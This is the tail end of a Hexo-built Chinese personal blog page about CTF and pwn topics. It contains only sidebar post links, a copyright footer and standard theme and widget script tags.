<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/d7e2e20f.html" title="pwn学习笔记（0）-事后补充">pwn学习笔记（0）-事后补充</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Game/" title="分类于 CTFer的比赛之路">CTFer的比赛之路</a>
</div>

    <span><a href="/posts/4bf5e0ee.html" title="【2024】LitCTF">【2024】LitCTF</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">g01den @ golden的部落阁</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
     <p><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn">蜀ICP备2024083302号</a><!--|<a target="_blank" rel="noopener" href="https://beian.mps.gov.cn/#/query/webSearch">公网安备XXXXXXXX号</a> -->
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: 'posts/9dd9bec.html',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//fastly.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/"});</script></body>
</html>
